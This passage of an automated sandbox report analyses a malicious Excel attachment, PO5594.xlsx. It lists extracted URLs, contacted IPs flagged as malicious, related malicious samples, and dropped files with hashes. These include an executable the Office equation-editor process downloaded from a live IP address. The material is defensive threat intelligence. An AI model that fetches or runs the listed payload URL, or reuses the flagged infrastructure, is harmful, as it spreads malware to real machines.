http://nsis.sf.net/NSIS_ErrorError	vbc.exe, 00000004.00000000.463068973.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.466962477.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp	false		high
http://treyresearch.net	explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
https://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0J	NETSTAT.EXE, 00000007.00000002.666910547.0000000002962000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmp	false		high
http://java.sun.com	explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.474694873.0000000001EC0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478152663.0000000001BE0000.00000002.00020000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	vbc.exe, vbc.exe, 00000004.00000000.463068973.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.466962477.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.482100672.00000000045D6000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleaner	explorer.exe, 00000006.00000000.489880080.0000000004513000.00000004.00000001.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	vbc.exe, 00000004.00000002.474694873.0000000001EC0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478152663.0000000001BE0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.autoitscript.com/autoit3	explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmp	false		high
https://support.mozilla.org	explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmp	false		high
http://servername/isapibackend.dll	explorer.exe, 00000006.00000000.489138123.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.514802576.0000000001C60000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
103.232.53.25	unknown	Viet Nam	45668	AIMS-MY-NETAIMSDataCentreSdnBhdMY	true
66.29.132.90	schittstore.com	United States	19538	ADVANTAGECOMUS	true
104.21.75.173	www.spacex-live.net	United States	13335	CLOUDFLARENETUS	true
75.2.60.5	www.metanetgateway.com	United States	16509	AMAZON-02US	true
162.241.253.231	sarahannsartstudio.com	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	513501
Start date:	02.11.2021
Start time:	09:25:44
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 52s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	PO5594.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@9/20@4/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 27.4% (good quality ratio 26.1%) Quality average: 73.1% Quality standard deviation: 28.8%
HCA Information:	Successful, ratio: 86% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
09:26:37	API Interceptor	160x Sleep call for process: EQNEDT32.EXE modified
09:26:50	API Interceptor	35x Sleep call for process: vbc.exe modified
09:27:07	API Interceptor	214x Sleep call for process: NETSTAT.EXE modified
09:27:58	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.232.53.25	PO0945.xlsx	Get hash	malicious	Browse	103.232.53.25/9990/vbc.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AIMS-MY-NETAIMSDataCentreSdnBhdMY	PO0945.xlsx	Get hash	malicious	Browse	103.232.53.25
	Confirmation Transfer Copy MT103-Ref-088091030101_PDF.exe	Get hash	malicious	Browse	103.232.55.66
	MVSEACON KOBE.xlsx	Get hash	malicious	Browse	103.232.53.184
	INVOICE56K.xlsx	Get hash	malicious	Browse	103.232.54.181
	INV564.xlsx	Get hash	malicious	Browse	103.232.54.181
	Confirmation Transfer Copy MT102-Ref-0001030101_PDF.exe	Get hash	malicious	Browse	103.232.55.66
	RECEIPT878.xlsx	Get hash	malicious	Browse	103.232.54.181
	MAERSK666.xlsx	Get hash	malicious	Browse	103.232.54.181
	Remittance copy.xlsx	Get hash	malicious	Browse	103.232.53.136
	MV MELINA.xlsx	Get hash	malicious	Browse	103.232.53.184
	Order_102121.xlsx	Get hash	malicious	Browse	103.232.53.136
	MMC Metal Corregir Cotizacin.xlsx	Get hash	malicious	Browse	103.232.53.42
	BM09 INV.PL.xlsx	Get hash	malicious	Browse	103.232.53.136
	lod4.xlsx	Get hash	malicious	Browse	103.232.53.136
	lod4.xlsx	Get hash	malicious	Browse	103.232.53.136
	lod2.xlsx	Get hash	malicious	Browse	103.232.53.136
	Payment_Order.xlsx	Get hash	malicious	Browse	103.232.53.136
	INVOICE827.xlsx	Get hash	malicious	Browse	103.232.54.181
	INVOICE707.xlsx	Get hash	malicious	Browse	103.232.54.181
	INVOICE44.xlsx	Get hash	malicious	Browse	103.232.54.181
ADVANTAGECOMUS	EQ034989.exe	Get hash	malicious	Browse	66.29.141.56
	Message.html	Get hash	malicious	Browse	66.29.132.29
	Message.html	Get hash	malicious	Browse	66.29.132.29
	RFQ#.exe	Get hash	malicious	Browse	66.29.137.46
	lCFjxhAqu3.exe	Get hash	malicious	Browse	66.29.132.143
	dhlexcel9078.excel.exe	Get hash	malicious	Browse	66.29.151.197
	Proforma Invoices.exe	Get hash	malicious	Browse	66.29.130.249
	tgSQwVSEzE.exe	Get hash	malicious	Browse	66.29.130.249
	QUOTE N #U00b0 067.exe	Get hash	malicious	Browse	66.29.145.43
	PO08485.xlsx	Get hash	malicious	Browse	66.29.145.86
	3sO4kwopMH.exe	Get hash	malicious	Browse	66.29.130.249
	FzvFtf2XXK.exe	Get hash	malicious	Browse	66.29.130.249
	pKD3j672HL.exe	Get hash	malicious	Browse	66.29.130.249
	dec.exe	Get hash	malicious	Browse	66.29.141.211
	PkF9Fg2Tnc.exe	Get hash	malicious	Browse	66.29.142.214
	2WK7SGkGVZ.exe	Get hash	malicious	Browse	66.29.130.249
	jnnbbMX9Ch.exe	Get hash	malicious	Browse	66.29.130.249
	vbc.exe	Get hash	malicious	Browse	66.29.130.249
	PURCHASE ORDER 29kva.exe	Get hash	malicious	Browse	66.29.145.99
	CpUNO6WMEm.exe	Get hash	malicious	Browse	66.29.130.249

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	downloaded
Size (bytes):	292696
Entropy (8bit):	7.940580532253791
Encrypted:	false
SSDEEP:	6144:wBlL/cZwF4JmEVpM2MJhVRcGO+LTYKJhUVTj9qsYKGV77ECn:CeZUSpMHwf4YRqsWvn
MD5:	11CBFA99FB5EBE8C09674E79B9834D96
SHA1:	6E94C5EF59E7A989D93C799217FBF1803B3BB4A4
SHA-256:	B7F38916FF521E44E651031EE54E631805F13963BAAF6FF6E3CC1AA72F1D0A43
SHA-512:	8429269ED2A747CF11DB3972AFA4A7A0CD59B4EA61D6D189EB17B660A66DD2A7FDEB6CD4F4439044665069060477F856D588634B0CF01F5F67CD6A039FE00CD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://103.232.53.25/8880/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.^...QF..QG.qQF.^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..\|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2962AA49.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DD5845C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3275C968.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6364
Entropy (8bit):	7.935202367366306
Encrypted:	false
SSDEEP:	192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
MD5:	A7E2241249BDCC0CE1FAAF9F4D5C32AF
SHA1:	3125EA93A379A846B0D414B42975AADB72290EB4
SHA-256:	EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
SHA-512:	A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...\|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw.....#..._....I....k.!":...H.....eKN.....9....{%......7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k\|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P\|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V\|.].-Oo..........._.;@c....`.....\|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35BED6CA.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19408
Entropy (8bit):	7.931403681362504
Encrypted:	false
SSDEEP:	384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
MD5:	63ED10C9DF764CF12C64E6A9A2353D7D
SHA1:	608BE0D9462016EA4F05509704CE85F3DDC50E63
SHA-256:	4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
SHA-512:	9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5\|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....\|AQ.h4....x..\6....\|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...\|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..\|0...x...\|..../F....o.._\|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AC55E10.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	498420
Entropy (8bit):	0.6413453967611162
Encrypted:	false
SSDEEP:	384:bKXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:AXwBkNWZ3cjvmWa+VDO
MD5:	253092ED7FC7A11EB7E73246CFCFF53D
SHA1:	B85995DB5C152CD0E2B9780C2AA0F75FC5A0C93E
SHA-256:	D5884EA5800BC2CAEA17513994955FBC6DC7040EBBBB5011EE96A44AC8511DEA
SHA-512:	2C838D963E9111A2919E008516D6AE1A03A24680C3C28856169A4DDD96684B7FDB0B43554F9C65063EC6A02D454FAF39E40C164292716798ED1CDDCEC53557FE
Malicious:	false
Preview:	....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................\$.......f.\.@F.%...... ............RQQ^...\|.........h..$QQ^...\|.. ...Id.\\|..... ............d.\........................................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...\|......8.\........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\539060AD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14828
Entropy (8bit):	7.9434227607871355
Encrypted:	false
SSDEEP:	384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
MD5:	58DD6AF7C438B638A88D107CC87009C7
SHA1:	F25E7F2F240DC924A7B48538164A5B3A54E91AC6
SHA-256:	9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
SHA-512:	C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...\|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..TQ.%..X.......{....,.q.\,.E".........z...abbB...j.\.J.(.b.......\|>...........R....L&..X.eYV"..-.R)B.TM&..pX.j.Z..9..F.Z.6....b.\./%..~...).B<..T.z..D"..(...\...d2YKKK...mm.T..l.T..I$.x<..J..q...J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.\|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..\|>/.Hd2....EQ.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E36B934.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19408
Entropy (8bit):	7.931403681362504
Encrypted:	false
SSDEEP:	384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
MD5:	63ED10C9DF764CF12C64E6A9A2353D7D
SHA1:	608BE0D9462016EA4F05509704CE85F3DDC50E63
SHA-256:	4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
SHA-512:	9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5\|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....\|AQ.h4....x..\6....\|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...\|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..\|0...x...\|..../F....o.._\|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96660C3F.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14828
Entropy (8bit):	7.9434227607871355
Encrypted:	false
SSDEEP:	384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
MD5:	58DD6AF7C438B638A88D107CC87009C7
SHA1:	F25E7F2F240DC924A7B48538164A5B3A54E91AC6
SHA-256:	9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
SHA-512:	C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...\|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..TQ.%..X.......{....,.q.\,.E".........z...abbB...j.\.J.(.b.......\|>...........R....L&..X.eYV"..-.R)B.TM&..pX.j.Z..9..F.Z.6....b.\./%..~...).B<..T.z..D"..(...\...d2YKKK...mm.T..l.T..I$.x<..J..q...J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.\|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..\|>/.Hd2....EQ.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AFCBBB6.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDFF6443.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
